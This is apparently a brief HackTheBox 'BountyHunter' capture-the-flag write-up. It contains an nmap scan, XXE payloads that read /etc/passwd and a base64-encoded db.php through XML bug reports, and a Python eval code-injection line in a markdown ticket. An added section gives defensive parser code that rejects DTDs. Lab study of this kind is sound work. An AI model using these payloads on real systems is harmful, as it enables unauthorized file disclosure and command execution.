HackTheBox-BountyHunter

NMAP

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

<!DOCTYPE arz  [Entity] >
<!ENTITY arz SYSTEM "file:///etc/passwd">
<!DOCTYPE test [<!ENTITY arz SYSTEM "file:///etc/passwd"> ]>

<?xml  version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>SQLI</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&arz;</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&example;</title>
<cwe>IDK</cwe>
<cvss>4.4</cvss>
<reward>99</reward>
</bugreport>

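
Added example, not part of the original write-up: the requests above that carry an inline DOCTYPE only have an effect if the server's XML parser honours it. The Python sketch below uses the standard-library expat bindings to parse the same bugreport structure while refusing any DOCTYPE or ENTITY declaration; parse_bugreport, RejectedReport and is_rejected are names made up for this example, and the field list is taken from the requests shown.

```python
import xml.parsers.expat

FIELDS = ("title", "cwe", "cvss", "reward")  # element names seen in the page's requests

class RejectedReport(ValueError):
    """The submitted XML is malformed or carries a DTD / entity declaration."""

def parse_bugreport(xml_bytes):
    """Return the report fields as a dict; refuse any DOCTYPE or ENTITY declaration."""
    parser = xml.parsers.expat.ParserCreate()
    report, stack = {}, []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedReport("DOCTYPE declaration not allowed")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise RejectedReport("entity declaration not allowed")

    def start(name, attrs):
        stack.append(name)
        if name in FIELDS:
            report[name] = ""

    def text(data):
        # Collect character data only while inside one of the expected fields.
        if stack and stack[-1] in FIELDS:
            report[stack[-1]] += data

    parser.StartDoctypeDeclHandler = forbid_doctype  # fires before any entity is defined
    parser.EntityDeclHandler = forbid_entity         # second line of defence
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = text
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        raise RejectedReport("malformed XML: %s" % exc) from exc
    missing = [f for f in FIELDS if f not in report]
    if missing:
        raise RejectedReport("missing fields: %s" % ", ".join(missing))
    return report

# Constructed inputs: the plain request and the entity-bearing request from this page.
HEADER = b'<?xml  version="1.0" encoding="ISO-8859-1"?>\n'
BODY = b"<bugreport><title>%s</title><cwe>IDK</cwe><cvss>4.4</cvss><reward>99</reward></bugreport>"
BENIGN = HEADER + BODY % b"SQLI"
WITH_DTD = (HEADER + b'<!DOCTYPE test [<!ENTITY arz SYSTEM "file:///etc/passwd"> ]>\n'
            + BODY % b"&arz;")

def is_rejected(xml_bytes):
    """True when parse_bugreport refuses the document."""
    try:
        parse_bugreport(xml_bytes)
    except RejectedReport:
        return True
    return False
```
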
# Skytrain Inc
## Ticket to
__Ticket Code:__
**102**+__import__('os').system('whoami')

ARZ101